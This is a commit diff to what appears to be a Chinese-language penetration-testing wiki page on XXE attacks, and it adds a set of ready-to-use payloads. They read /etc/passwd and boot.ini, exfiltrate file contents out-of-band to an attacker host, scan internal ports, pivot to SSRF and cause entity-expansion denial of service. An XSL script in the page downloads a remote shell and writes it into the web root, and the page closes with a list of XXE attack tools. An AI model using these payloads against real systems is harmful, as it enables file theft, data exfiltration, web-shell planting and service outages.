update XSS.md

xiaoy-sec · Jun 17, 2022 · 9aa3ea4 · 9aa3ea4
1 parent ac29ecf
commit 9aa3ea4
Show file tree

Hide file tree

Showing 2 changed files with 532 additions and 42 deletions.
diff --git a/wiki/初始访问/Web服务突破/XML.md b/wiki/初始访问/Web服务突破/XML.md
@@ -29,7 +29,7 @@
   #### XXE
 	https://github.com/AonCyberLabs/xxe-recursive-download
 	程序解析XML输入时，未禁止外部实体的加载，造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害
-    判断
+  ##### 判断
 	回显路径
 		<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "test">%remote;]>
 	DNSLOG
@@ -39,7 +39,7 @@
 	Webdav
 		存在webdav可使用PROPPATCH、PROPFIND、 LOCK等请求方法接受xml输入形成xxe
 	Wsdl使用AWVS测试
-    挖掘
+  ##### 挖掘
 	如遇与xml交互的地方
 	<?xml version="1.0" encoding="UTF-8"?> 
 	<!DOCTYPE ANY [  
@@ -63,7 +63,26 @@
 	<参数name>name</参数name>
 	<参数value>&xxe;</ 参数value>
 	</root>
-    有回显读取本地文件
+
+	<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
+
+	<?xml version="1.0"?>
+	<!DOCTYPE data [
+	<!ELEMENT data (#ANY)>
+	<!ENTITY file SYSTEM "file:///etc/passwd">
+	]>
+	<data>&file;</data>
+
+	<?xml version="1.0" encoding="ISO-8859-1"?>
+	<!DOCTYPE foo [  
+	<!ELEMENT foo ANY >
+	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
+
+	<?xml version="1.0" encoding="ISO-8859-1"?>
+	<!DOCTYPE foo [  
+	<!ELEMENT foo ANY >
+	<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+  ##### 有回显读取本地文件
 	<?xml version="1.0" encoding="utf-8"?> 
 	<!DOCTYPE creds [  
 	<!ENTITY goodies SYSTEM "file:////etc/passwd"> ]> 
@@ -82,7 +101,7 @@
 	evil.dtd
 	<?xml version="1.0" encoding="UTF-8"?> 
 	<!ENTITY all "%start;%goodies;%end;">
-    Blind OOB XXE无回显读取
+  ##### Blind OOB XXE无回显读取
 	需使用参数实体，引用外部DTD
 	Payload
 	<!DOCTYPE convert [ 
@@ -92,15 +111,16 @@
 	test.dtd
 	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
 	<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://attacker:9999?p=%file;'>">
-    列目录
+  ##### 列目录
 	远程payload
 	<!ENTITY % a SYSTEM "file:///"> <!ENTITY % b "<!ENTITY &#37; c SYSTEM 'gopher://ip:80/%a;'>"> %b; %c;
 	注入payload
 	<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker:80/1.xml">%remote;]><root/>
 
-    不同平台支持的协议
+	不同平台支持的协议
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/11.png)
-    执行命令
+
+  ##### 执行命令
 	安装expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。
 	<?xml version="1.0" encoding="utf-8"?>
 	<!DOCTYPE xxe [
@@ -109,40 +129,40 @@
 	<root>
 	<name>&xxe;</name>
 	</root>
-    内网主机探测
+  ##### 内网主机探测
 	可先读取/etc/network/interfaces、/proc/net/arp、/etc/hosts等文件查询IP段
 	使用脚本
-    内网端口扫描
+  ##### 内网端口扫描
 	<?xml version="1.0" encoding="utf-8"?>  
 	<!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [  
 	<!ELEMENT data (#PCDATA)>  
 	]>
 	<data>4</data>
 	可使用burpsuite的intruder模块进行遍历
-    内部DTD利用
-    Linux
+  ##### 内部DTD利用
+	Linux
 	<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
 	<!ENTITY % ISOamsa 'Your DTD code'>
 	%local_dtd;
-    Windows
+	Windows
 	<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
 	<!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'>
 	%local_dtd;
 	<?xml version="1.0" ?>
 	<!DOCTYPE message [
-    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
+	<!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
 
-    <!ENTITY % condition 'aaa)>
+	<!ENTITY % condition 'aaa)>
         <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
         &#x25;eval;
         &#x25;error;
         <!ELEMENT aa (bb'>
 
-    %local_dtd;
+	%local_dtd;
 	]>
 	<message>any text</message>
-    XXE写shell
+  ##### XXE写shell
 	当XXE支持XSL时
 	<?xml version='1.0'?>
 	<xsl:stylesheet version="1.0"
@@ -157,11 +177,47 @@
 	    webClient.DownloadFile("https://x.x.x.x/shell.txt",
                        @"c:\inetpub\wwwroot\shell.aspx");
 
-    return "Exploit Success";
+	return "Exploit Success";
 	}
 	]]>
 	</msxsl:script>
 	<xsl:template match="/">
 	<xsl:value-of select="user:xml()"/>
 	</xsl:template>
 	</xsl:stylesheet>
+  ##### XXE 进行 SSRF
+	<?xml version="1.0" encoding="ISO-8859-1"?>
+	<!DOCTYPE foo [
+	<!ELEMENT foo ANY >
+	<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >
+	]>
+	<foo>&xxe;</foo>
+  ##### XXE 进行拒绝服务攻击
+  	<!DOCTYPE data [
+	<!ENTITY a0 "dos" >
+	<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
+	<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
+	<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
+	<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
+	]>
+	<data>&a4;</data>
+  ##### 基于报错的XXE
+  	PAYLOAD:
+  	<?xml version="1.0" ?>
+	<!DOCTYPE message [
+	    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
+	    %ext;
+	]>
+	ext.dtd 的内容
+	<!ENTITY % file SYSTEM "file:///etc/passwd">
+	<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+	%eval;
+	%error;
+	<message></message>
+  ##### 工具
+  	https://github.com/staaldraad/xxeserv
+	https://github.com/lc/230-OOB
+	https://github.com/enjoiz/XXEinjector
+	https://github.com/BuffaloWill/oxml_xxe
+	https://github.com/whitel1st/docem
+	http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html